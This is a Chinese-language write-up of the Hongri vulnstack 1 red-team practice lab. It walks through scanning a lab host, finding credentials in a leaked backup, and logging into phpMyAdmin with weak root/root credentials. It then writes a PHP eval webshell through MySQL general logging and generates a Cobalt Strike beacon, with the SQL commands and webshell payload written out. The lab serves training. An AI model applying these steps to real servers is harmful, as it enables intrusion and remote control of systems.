ATT&CK 實戰 - 紅日安全 vulnstack (一)


0x01 關於紅日靶場的下載和介紹

百度網盤: https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset

密碼: 【紅日安全】您的下載密碼為:n1u2。

紅隊實戰系列,主要以真實企業環境為實例搭建一系列靶場,通過練習、視頻教程、博客三位一體學習。另外本次實戰完全模擬ATT&CK攻擊鏈路進行搭建,開成完整閉環。后續也會搭建真實APT實戰環境,從實戰中成長。關於環境可以模擬出各種各樣實戰路線,目前給出作者實戰的一套攻擊實戰路線如下,虛擬機所有統一密碼:hongrisec@2019:

網絡配置如圖所示

打開虛擬網絡編輯器
image

設置VMnet1子網IP
image

添加Vmnet2子網IP
image

網絡拓撲圖
image

實際配置的截圖為
image


0x02 滲透服務器

信息收集

打開win7 x64的 phpstudy

image

發現主機

netdiscover -i eth0 -r 192.168.52.0/24

image

使用攻擊機kali自帶的 nmap 進行端口掃描

nmap -sS -A -n -T4 -p- 192.168.52.143

image
可知道已經開啟勒 80 和其他端口

訪問 80 端口

image
phpstudy的探針界面,我們使用 root/root 開始連接一下數據庫
image
image
正上腳提示已經連接數據庫成功

使用御劍開始進行掃描

image

得到 /phpmyadmin ,我們先放着我們的掃描得到的端口

使用 Dirmap 對於網站掃描以便得到網站的目錄文件

dirmap.py -i http://192.168.52.143/ -lcf

image
下載源碼文件 beifen.rar ,審查文件
使用VScode的搜索功能在PHP源文件(beifen\yxcms\data\db_back\1384692844.sql.php)找到密碼
image
得到后台登陸的賬號密碼:admin:123456 和登錄路徑 /index.php?r=admin

0x03 開始 拿shell

登入 /phpmyadmin
弱密碼 root/root

使用SQL語句查看是否有無權限

show variables like '%secure_file%';

image
secure_file_priv 值為 NULL 不能使用into 方法導入shell

我們嘗試在日記寫 shell ,使用SQL語句開啟日志服務

set global general_log = "ON";

image

查看當前日志: show variables like 'general%';:
image

指定日志文件: set global general_log_file = "C:/phpStudy/www/1.php";:
image

開始寫入一句話木馬
SELECT '<?php eval($_POST["cmd"]);?>'
image

記錄一下出錯是怎么回事兒,自己運行的 phpstudy 是在桌面上(Desktop)的 ,直接桌面上的導致路徑出錯,桌面上的打開的 phpstudy 的文件是在 C:\WWWW
實際上輸入一句話放在地方是 C:\phpStudy\WWW
因為自己電腦裝了兩個 phpstudy 所以導致路徑的問題,解決方法是:直接進入 C:\phpStudy 打開 PHPSTUDY.EXE

這樣我們就成功拿到 shell
image

0x04 另一種方式獲取到SHELL

我們打開 192.168.52.143/yxcms
查看一下是否存在 目錄遍歷漏洞
image
我們使用之前得到的地址訪問 /index.php?r=admin 進入后台
密碼之前已經得到了:admin/123456
image
在前台模板的模塊寫入一句話木馬
image
使用蟻劍連接到 shell

0x05 內網以及與域滲透

使用 CS 創建 Listenpayload 選擇 beacon http
image
image
然后選擇 攻擊 -> 生成后門 -> Windows Executable(S) 選擇剛創建的 Listenner
image
image
由於我們之前關閉勒防火牆,所以我們直接點擊生成的 exe 文件就可以獲得CS的shell
image


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM